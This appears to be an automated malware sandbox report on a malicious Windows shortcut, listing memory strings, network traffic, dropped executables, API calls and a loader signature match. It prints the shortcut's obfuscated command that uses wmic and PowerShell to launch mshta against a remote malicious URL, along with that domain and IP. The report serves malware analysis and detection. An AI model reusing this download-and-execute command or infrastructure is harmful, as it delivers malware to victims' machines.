Source: powershell.exe, 00000015.00000002.1752565815.00000234E6132000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.c
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.co
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB582FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E5C2B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/2
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734405681.000001CA44E5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, tzA45NGAW4.lnk	String found in binary or memory: https://tiffany-careers.com/Ghep2712
Source: powershell.exe	String found in binary or memory: https://tiffany-careers.com/Ghep2712$global:?
Source: mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712&
Source: mshta.exe, 00000006.00000002.1735347435.000001D2479B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732670333.000001D247A7D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1735799649.000001D247A7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1722333655.000001D247A7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712...
Source: mshta.exe, 00000006.00000002.1736392395.000001D24D5BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712:asLMEMP
Source: powershell.exe, 00000005.00000002.1416759046.000002C8D58E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734112059.000001CA44D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732303015.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732823139.000001CA44E5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734405681.000001CA44E5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712C:
Source: powershell.exe, 00000005.00000002.1412646276.000002C8BB7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712CPL
Source: mshta.exe, 00000006.00000002.1734112059.000001CA44D80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712E
Source: mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712G
Source: mshta.exe, 00000006.00000002.1734524084.000001CA46810000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712H
Source: mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712N
Source: mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712PPC:
Source: powershell.exe, 00000005.00000002.1412141272.000002C8BB632000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712Vz
Source: mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712_
Source: mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712ent
Source: powershell.exe, 00000005.00000002.1413336162.000002C8BDA19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712h
Source: mshta.exe, 00000006.00000003.1729696758.000001D24D985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712https://tiffany-careers.com/Ghep2712
Source: mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712l
Source: powershell.exe, 00000005.00000002.1413336162.000002C8BD571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712p
Source: mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712rnationali
Source: mshta.exe, 00000006.00000002.1734011062.000001CA44D60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712userLOCALAPPpy
Source: powershell.exe, 00000005.00000002.1412141272.000002C8BB632000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Ghep2712x
Source: powershell.exe, 00000009.00000002.1579963511.000001FB582FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/Project_Information.pdf
Source: qJXhXwR.exe, 0000000F.00000002.1641570174.000002009EE89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/kSMAbiand
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/q
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJ
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJX
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXh
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhX
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXw
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXwR
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXwR.
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXwR.e
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXwR.ex
Source: powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/qJXhXwR.exe
Source: powershell.exe, 00000015.00000002.1752565815.00000234E4CE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tiffany-careers.com/tlUmNmGG.txt
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.23.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	String found in binary or memory: https://www.globalsign.com/repository/06

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.9:49728 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5230D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

15_2_00007FF7A5230D24

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5230D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	15_2_00007FF7A5230D24
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00964830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	23_2_00964830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	27_2_001A4830

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5230A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

15_2_00007FF7A5230A6C

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5218E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,

15_2_00007FF7A5218E18

Source: C:\Users\Public\Guard.exe	Code function: 23_2_0097D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		23_2_0097D164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001BD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		27_2_001BD164

System Summary

Malicious sample detected (through community Yara rule)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1], type: DROPPED

Matched rule: Emmenhtal Loader string Author: Sekoia.io

Binary is likely a compiled AutoIt script file

Source: powershell.exe, 00000009.00000002.1654631616.000001FB6859F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_c23b5a89-2
Source: powershell.exe, 00000009.00000002.1654631616.000001FB6859F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*	memstr_85d1f875-1
Source: powershell.exe, 00000009.00000002.1654631616.000001FB6830F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5467b060-7
Source: powershell.exe, 00000009.00000002.1654631616.000001FB6830F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*	memstr_8cb3dceb-7
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: This is a third-party compiled AutoIt script.	15_2_00007FF7A51A37B0
Source: qJXhXwR.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: qJXhXwR.exe, 0000000F.00000000.1554853365.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f832d6de-f
Source: qJXhXwR.exe, 0000000F.00000000.1554853365.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*!	memstr_7b354c14-e

Contains functionality to create processes via WMI

Source: WMIC.exe, 00000001.00000002.1387012567.000002A3A2BD0000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')"C:\Users\user\Desktop\tzA45NGAW4.lnkWinsta0\DefaultKI

memstr_9cef0294-c

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\qJXhXwR.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\Public\Guard.exe			Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Windows shortcut file (LNK) contains suspicious command line arguments

Source: tzA45NGAW4.lnk

LNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/Ghep2712')"

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5223E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

15_2_00007FF7A5223E20

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A520CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

15_2_00007FF7A520CE68

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	15_2_00007FF7A521D750
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00955778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	23_2_00955778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_00195778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	27_2_00195778

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FF886CA0E70	9_2_00007FF886CA0E70
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A523F630	15_2_00007FF7A523F630
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524C6D4	15_2_00007FF7A524C6D4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524055C	15_2_00007FF7A524055C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524A59C	15_2_00007FF7A524A59C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51DA8A0	15_2_00007FF7A51DA8A0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E67F0	15_2_00007FF7A51E67F0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C02C4	15_2_00007FF7A51C02C4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51CC130	15_2_00007FF7A51CC130
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D84C0	15_2_00007FF7A51D84C0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C4514	15_2_00007FF7A51C4514
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5236320	15_2_00007FF7A5236320
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5238360	15_2_00007FF7A5238360
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52283D4	15_2_00007FF7A52283D4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E2400	15_2_00007FF7A51E2400
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51CC3FC	15_2_00007FF7A51CC3FC
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51B2E30	15_2_00007FF7A51B2E30
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A524CE8C	15_2_00007FF7A524CE8C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51C0E90	15_2_00007FF7A51C0E90
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51B0E70	15_2_00007FF7A51B0E70
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E2D20	15_2_00007FF7A51E2D20
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E6DE4	15_2_00007FF7A51E6DE4
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D30DC	15_2_00007FF7A51D30DC
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51A2AE0	15_2_00007FF7A51A2AE0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5240AEC	15_2_00007FF7A5240AEC
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5236C34	15_2_00007FF7A5236C34
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A52356A0	15_2_00007FF7A52356A0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51D95B0	15_2_00007FF7A51D95B0
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51E1840	15_2_00007FF7A51E1840
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A51A183C	15_2_00007FF7A51A183C
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A521D87C	15_2_00007FF7A521D87C
